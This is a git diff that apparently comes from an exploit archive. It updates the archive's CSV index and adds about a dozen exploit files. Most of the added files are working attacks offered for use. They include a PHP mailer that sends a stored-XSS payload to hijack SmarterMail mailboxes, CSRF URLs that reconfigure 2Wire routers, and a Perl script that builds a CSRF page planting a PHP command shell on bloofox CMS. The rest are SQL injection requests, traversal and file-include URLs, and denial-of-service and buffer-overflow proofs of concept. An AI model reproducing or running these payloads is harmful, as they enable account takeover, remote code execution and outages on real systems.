diff --git a/files.csv b/files.csv index 2e6d5d0c1..815935a2a 100755 --- a/files.csv +++ b/files.csv @@ -18232,7 +18232,7 @@ id,file,description,date,author,platform,type,port 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (1)",2001-06-21,"Luca Ercoli",linux,dos,0 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (2)",2001-06-21,mu-b,linux,remote,0 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (3)",2006-10-06,mu-b,linux,remote,0 -20955,platforms/windows/dos/20955.pl,"Internet Download Manager All Versions Memory Corruption Vulnerability",2012-08-31,Dark-Puzzle,windows,dos,0 +20955,platforms/windows/dos/20955.pl,"Internet Download Manager All Versions - Memory Corruption Vulnerability",2012-08-31,Dark-Puzzle,windows,dos,0 20956,platforms/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,php,webapps,0 20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 Remote Format String Vulnerability",2012-08-31,coolkaveh,windows,dos,0 20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 and 3.1.9 XSS Vulnerability",2012-08-31,"Mike Eduard",windows,webapps,0 @@ -18580,9 +18580,9 @@ id,file,description,date,author,platform,type,port 21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability",2002-03-07,Morgan,unix,remote,0 21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 21317,platforms/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 -21318,platforms/windows/local/21318.pl,"Internet Download Manager All Versions Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 +21318,platforms/windows/local/21318.pl,"Internet Download Manager All Versions - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21319,platforms/aix/webapps/21319.txt,"Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF",2012-09-14,modpr0be,aix,webapps,0 -21320,platforms/windows/local/21320.pl,"Internet Download Manager All Versions SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 +21320,platforms/windows/local/21320.pl,"Internet Download Manager All Versions - SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21323,platforms/linux/local/21323.c,"libdbus 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 21324,platforms/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 21326,platforms/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 Integer Overflow Vulnerability",2012-09-17,"Francis Provencher",windows,dos,0 @@ -19076,7 +19076,7 @@ id,file,description,date,author,platform,type,port 21823,platforms/windows/dos/21823.c,"Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 Memory Corruption (DoS)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 21825,platforms/php/webapps/21825.txt,"phpWebsite 0.8.2 PHP File Include Vulnerability",2002-09-23,"Tim Vandermeersch",php,webapps,0 -21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition SEH Based Buffer Overflow PoC",2012-10-09,Dark-Puzzle,windows,dos,0 +21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - SEH Based Buffer Overflow PoC",2012-10-09,Dark-Puzzle,windows,dos,0 21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability",2002-09-23,"Taylor Huff",hardware,remote,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch Device Reset Denial of Service Vulnerability",2002-09-24,"Brook Powers",hardware,dos,0 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 HTML Injection Vulnerability",2002-09-24,das@hush.com,php,webapps,0 @@ -19233,8 +19233,8 @@ id,file,description,date,author,platform,type,port 21983,platforms/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T Information Disclosure Vulnerability",2002-11-04,"Tom Knienieder",hardware,remote,0 21984,platforms/unix/dos/21984.c,"QNX 6.1 TimeCreate Local Denial of Service Vulnerability",2002-11-06,"Pawel Pisarczyk",unix,dos,0 21985,platforms/linux/dos/21985.txt,"Pine 4.x From: Field Heap Corruption Vulnerability",2002-11-07,lsjoberg,linux,dos,0 -21986,platforms/windows/dos/21986.pl,"Windows Media Player 10 .avi Integer Division By Zero Crash PoC",2012-10-15,Dark-Puzzle,windows,dos,0 -21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 +21986,platforms/windows/dos/21986.pl,"Windows Media Player 10 - .avi Integer Division By Zero Crash PoC",2012-10-15,Dark-Puzzle,windows,dos,0 +21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 21989,platforms/php/webapps/21989.txt,"Cartweaver 3 Local File Inclusion Vulnerability",2012-10-15,HaxOr,php,webapps,0 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection",2012-10-15,pennyGrit,php,webapps,0 21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 m2p quartz.dll Heap Pointer Overwrite PoC",2012-10-15,"James Ritchey",windows,dos,0 @@ -19250,7 +19250,7 @@ id,file,description,date,author,platform,type,port 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 File Disclosure Vulnerability",2002-11-08,"Tamer Sahin",windows,remote,0 22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 Application Packager Non-Explicit Path Execution Vulnerability",2002-11-08,Texonet,linux,local,0 22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) - SQL Injection",2012-10-16,Zixem,php,webapps,0 -22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 +22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component - (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 22005,platforms/hardware/webapps/22005.txt,"visual tools dvr <= 3.0.6.16, vx series <= 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 - Remote Heap Corruption Vulnerability",2012-10-16,"Lorenzo Cantoni",windows,dos,0 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 @@ -19633,7 +19633,7 @@ id,file,description,date,author,platform,type,port 22393,platforms/php/webapps/22393.txt,"OSCommerce 2.1/2.2 Checkout_Payment.PHP Error Output Cross-Site Scripting Vulnerability",2003-03-20,"iProyectos group",php,webapps,0 22394,platforms/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability",2003-03-21,"Dr. Peter Bieringer",hardware,remote,0 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 Multiple Chat Dialog Resource Consumption Vulnerability",2003-03-21,"Auriemma Luigi",windows,dos,0 -22396,platforms/php/webapps/22396.txt,"Wordpress bbpress Plugin Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 +22396,platforms/php/webapps/22396.txt,"Wordpress bbpress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 22398,platforms/php/webapps/22398.php,"Invision Power Board <= 3.3.4 ""unserialize()"" PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent XSS",2012-11-01,"CYBSEC Labs",php,webapps,0 @@ -27627,9 +27627,9 @@ id,file,description,date,author,platform,type,port 30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80 -30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",2014-01-07,metasploit,php,remote,80 -30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 -30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 +30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload",2014-01-07,metasploit,php,remote,80 +30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 +30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 @@ -27705,6 +27705,7 @@ id,file,description,date,author,platform,type,port 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30865,platforms/php/webapps/30865.txt,"DomPHP <= v0.83 - Local Directory Traversal Vulnerability",2014-01-12,Houssamix,php,webapps,0 30872,platforms/php/webapps/30872.txt,"DomPHP <= v0.83 - SQL Injection Vulnerability",2014-01-13,Houssamix,php,webapps,0 30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 @@ -27744,7 +27745,7 @@ id,file,description,date,author,platform,type,port 30912,platforms/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 30913,platforms/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 30914,platforms/hardware/webapps/30914.txt,"Conceptronic Wireless Pan & Tilt Network Camera - CSRF Vulnerability",2014-01-14,"Felipe Molina",hardware,webapps,80 -30915,platforms/hardware/remote/30915.rb,"SerComm Device Remote Code Execution",2014-01-14,metasploit,hardware,remote,32764 +30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution",2014-01-14,metasploit,hardware,remote,32764 30916,platforms/php/webapps/30916.txt,"Burden 1.8 - Authentication Bypass",2014-01-14,"High-Tech Bridge SA",php,webapps,80 30917,platforms/php/webapps/30917.txt,"Horizon QCMS 4.0 - Multiple Vulnerabilities",2014-01-14,"High-Tech Bridge SA",php,webapps,80 30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 'index.php' Local File Include Vulnerability",2007-12-20,JuMp-Er,php,webapps,0 @@ -27828,3 +27829,13 @@ id,file,description,date,author,platform,type,port 31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/user/main.jsp activeControl Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31008,platforms/php/webapps/31008.txt,"Joomla-SMF Forum 1.1.4 Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 'liste.php' SQL Injection Vulnerability",2008-01-10,consultant.securite,php,webapps,0 +31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 +31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 'view_func.php' Remote File Include Vulnerability",2008-01-11,ShipNX,php,webapps,0 +31013,platforms/hardware/remote/31013.txt,"2Wire Routers Cross-Site Request Forgery Vulnerability",2008-01-15,hkm,hardware,remote,0 +31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 +31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80 +31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 +31020,platforms/php/webapps/31020.txt,"Moodle <= 1.8.3 'install.php' Cross Site Scripting Vulnerability",2008-01-12,"Hanno Bock",php,webapps,0 +31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability",2008-01-12,"David Barroso",osx,dos,0 +31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 'index.php' Cross Site Scripting Vulnerability",2008-01-13,"Christophe VG",php,webapps,0 +31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow Vulnerability",2008-01-11,anonymous,windows,remote,0 diff --git a/platforms/asp/webapps/31017.php b/platforms/asp/webapps/31017.php new file mode 100755 index 000000000..6e77951da --- /dev/null +++ b/platforms/asp/webapps/31017.php @@ -0,0 +1,78 @@ +Click Me, Please...\r\n + + NOTE: javascript html char encode = javaScRipt + + then you will be able to get into the victim's mailbox via the url: + http://[WebSite]/[Smarter]/Default.aspx + +## I used phpmailer class for beside of the exploit so you need to download it here and run the exploit in the phpmailer directory: + http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list + + +*/ + +echo "SmarterMail Enterprise and Standard <= 11.X XSS Exploit"; +require_once('class.phpmailer.php'); + +$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch +$mail->IsSMTP(); // telling the class to use SMTP + + +/* SETTINGS */ +$smtp_user = "attacker[at]email.com"; // any valid smtp account +$smtp_pass = "PASSWORD"; // Your PASSWORD +$smtp_port = "25"; // SMTP PORT Default: 25 +$smtp_host = "mail.email.com"; // any valid smtp server +$victim = "victim@mail.com"; +$subject = "Salam"; +$body = 'Click Me, Please...\r\n'; + + +try { + $mail->SMTPDebug = 2; // enables SMTP debug information (for testing) + $mail->SMTPAuth = true; // enable SMTP authentication + $mail->Host = $smtp_host; + $mail->Port = $smtp_port; + $mail->Username = $smtp_user; // SMTP account username + $mail->Password = $smtp_pass; // SMTP account password + + $mail->SetFrom($smtp_user, 'Attacker'); + $mail->AddReplyTo($smtp_user, 'Attacker'); + + $mail->AddAddress($victim, 'Victim'); + $mail->Subject = $subject; + + $mail->MsgHTML($body); + $mail->Send(); + echo "Message Sent OK

\n"; +} catch (phpmailerException $e) { + echo $e->errorMessage(); +} catch (Exception $e) { + echo $e->getMessage(); +} +?> + + + diff --git a/platforms/hardware/remote/31013.txt b/platforms/hardware/remote/31013.txt new file mode 100755 index 000000000..99bb1eaca --- /dev/null +++ b/platforms/hardware/remote/31013.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/27246/info + +Multiple 2Wire routers are prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to execute arbitrary actions on an affected device. + +Set a password (NUEVOPASS): +http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS + +Add names to the DNS: +http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1 + +Disable Wireless Authentication +http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0 + +Set Dynamic DNS +http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE \ No newline at end of file diff --git a/platforms/multiple/remote/31010.sql b/platforms/multiple/remote/31010.sql new file mode 100755 index 000000000..dc7e411e9 --- /dev/null +++ b/platforms/multiple/remote/31010.sql @@ -0,0 +1,60 @@ +source: http://www.securityfocus.com/bid/27229/info + +Oracle has released its critical patch update for January 2008. The advisory addresses 26 vulnerabilities affecting Oracle Database, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite, Oracle Enterprise Manager, and Oracle People Soft Enterprise. + +The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly compromise affected computers. + +/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ +/******* BUFFER OVERFLOW *********/ +/******************************************************************/ +/************ POC exploit , Crash database **************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 28, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ +/* thanks to oraclefun for his pitrig_dropmetadata exploit */ +/* */ +/******************************************************************/ + + +set serveroutput on +declare + buff varchar2(32767); + begin + /* generate evil buffer */ + buff:='12345678901234567890123456789'; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||'0012345678901234567890123sh2kerr'; + /* lets see the buffer size */ + dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); + xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); + end; + / + + +/* P.S. xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */ + + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ diff --git a/platforms/osx/dos/31021.html b/platforms/osx/dos/31021.html new file mode 100755 index 000000000..c1d482e4c --- /dev/null +++ b/platforms/osx/dos/31021.html @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/27261/info + +Apple Safari is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to crash the affected application, denying service to legitimate users. + +Apple Safari 2 running on Mac OS X is vulnerable. + + + +Safari Exploit + + + +
+ + +
+ + diff --git a/platforms/php/webapps/30865.txt b/platforms/php/webapps/30865.txt new file mode 100755 index 000000000..a710d9044 --- /dev/null +++ b/platforms/php/webapps/30865.txt @@ -0,0 +1,16 @@ +------------------------------------------------------------- +DomPHP <= v0.83 Local Directory Traversal Vulnerability +------------------------------------------------------------- + += Author : Houssamix += Script : DomPHP <= v0.83 + += Download : http://www.domphp.com/download/ + += BUG : Local Directory Traversal Vulnerability + += Exploit : +http://[target]/photoalbum/index.php?urlancien=&url=[Directory] + +Exemple : +http://target.com/photoalbum/index.php?urlancien=&url=../../ \ No newline at end of file diff --git a/platforms/php/webapps/31011.txt b/platforms/php/webapps/31011.txt new file mode 100755 index 000000000..e77c54167 --- /dev/null +++ b/platforms/php/webapps/31011.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27244/info + +Members Area System is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. + +This issue affects Members Area System 1.7; other versions are also likely affected. + +http://www.example.com/view_func.php?i=http://www.example2.com/justsomedir/&l=testfile.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31015.txt b/platforms/php/webapps/31015.txt new file mode 100755 index 000000000..952a18e21 --- /dev/null +++ b/platforms/php/webapps/31015.txt @@ -0,0 +1,149 @@ +bloofoxCMS V0.5.0 - Multiple Vulnerabilties +=================================================================== + +#################################################################### +.:. Author : AtT4CKxT3rR0r1ST +.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.bloofox.com/download.21.html +#################################################################### + +[1] Multiple Sql Injection +========================== +I. http://localhost/bloofox/index.php?login=true + + +POST /bloofox/index.php?login=true HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 +Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/bloofox/index.php?login=true +Cookie: +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 39 + +login=Login&password=IPHOBOS&username=\[SQL INJECTION] + + +II. http://localhost/bloofox/admin/index.php + + +POST /bloofox/admin/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 +Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/bloofox/admin/ +Cookie: +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 41 + +action=login&password=IPHOBOS&username=\[SQL INJECTION] + + +[2] Cross Site Request Forgery +=============================== + +[Add Admin] + + + +
+ + + + + + + + + +
+ + + +[3] Local File Include +======================= +VULNERABILITY +############## +/admin/include/inc_settings_editor.php (line 56-69) + +// show file +if(isset($_POST["fileurl"])) { + $fileurl = $_POST["fileurl"]; +} +if(isset($_GET["fileurl"])) { + $fileurl = "../".$_GET["fileurl"]; +} + +if(file_exists($fileurl)) { + $filelength = filesize($fileurl); + $readfile = fopen($fileurl,"r"); + $file = fread($readfile,$filelength); + fclose($readfile); +} + + + +######### +EXPLOIT +######### + +http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php + +#################################################################### + +#!/usr/bin/perl +######################################################################## +# Title : bloofoxCMS V0.5.0 - Csrf inject php code +# Author : AtT4CKxT3rR0r1ST +# Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] +# Home : http://www.iphobos.com/blog/ +# Script : http://www.bloofox.com/download.21.html +# Version : 0.5.0 +# Dork : "Powered by bloofoxCMS" +# Vulnerability In Languages Editor +# Note : Can Edit Any File Php In Script Just Change Value[Director/file] +In Fileurl +use LWP::UserAgent; +use LWP::Simple; +system("cls"); +print "|----------------------------------------------------|\n"; +print "| bloofoxCMS V0.5.0 - Csrf inject php code |\n"; +print "| Coded by : AtT4CKxT3rR0r1ST |\n"; +print "| GREATS TO MY LOVE |\n"; +print "|----------------------------------------------------|\n"; +sleep(2); +print "\nInsert Target:"; +$h = ; +chomp $h; +$html = ' + +
+ + + +
+ +'; +sleep(1); +print "Createing Done ...\n"; +open(XSS , '>>csrf.html'); +print XSS $html; +close(XSS); +print "Now Send csrf.html To Admin \n"; +sleep(1); +print "To Exploit [http://site/languages/deutsch.php?cmd= COMMAND] \n"; + + +#EDB note: Actually couldn't get the SQLi to trigger the CSRF does work. \ No newline at end of file diff --git a/platforms/php/webapps/31020.txt b/platforms/php/webapps/31020.txt new file mode 100755 index 000000000..3d3fd5438 --- /dev/null +++ b/platforms/php/webapps/31020.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27259/info + +Moodle is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects versions prior to Moodle 1.8.4. + +
\ No newline at end of file diff --git a/platforms/php/webapps/31022.txt b/platforms/php/webapps/31022.txt new file mode 100755 index 000000000..9d9a17e13 --- /dev/null +++ b/platforms/php/webapps/31022.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27268/info + +PHP Running Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects versions prior to PHP Running Management 1.0.3. + +http://www.example.com/index.php?message=%3Cscript%3Edocument.writeln(123)%3C/script%3E%20 \ No newline at end of file diff --git a/platforms/windows/dos/31014.py b/platforms/windows/dos/31014.py new file mode 100755 index 000000000..1d8f59646 --- /dev/null +++ b/platforms/windows/dos/31014.py @@ -0,0 +1,26 @@ +########################################################### +[~] Exploit Title: haneWIN DNS Server 1.5.3 - Denial of service +[~] Author: sajith +[~] version: haneWIN DNS Server 1.5.3 +[~]Vendor Homepage: http://www.hanewin.net/ +[~] vulnerable app link:http://www.hanewin.net/dns-e.htm +[~]Tested in windows Xp sp3 +########################################################### +#POC by sajith shetty +import socket + +target = "127.0.0.1" +port = 53 + +try: +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((target, port)) +buf = "A" * 3000 +request = buf +s.send(request) +data = s.recv(1024) +print data + +except: + +print "DNS server is Down!" diff --git a/platforms/windows/remote/31023.html b/platforms/windows/remote/31023.html new file mode 100755 index 000000000..10bf16d6e --- /dev/null +++ b/platforms/windows/remote/31023.html @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/27271/info + +Qvod Player 'QvodInsert.dll' ActiveX control is prone to is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions. + +The issue affects versions prior to Qvod Player 2.1.5 build 0053. + + + + + + + +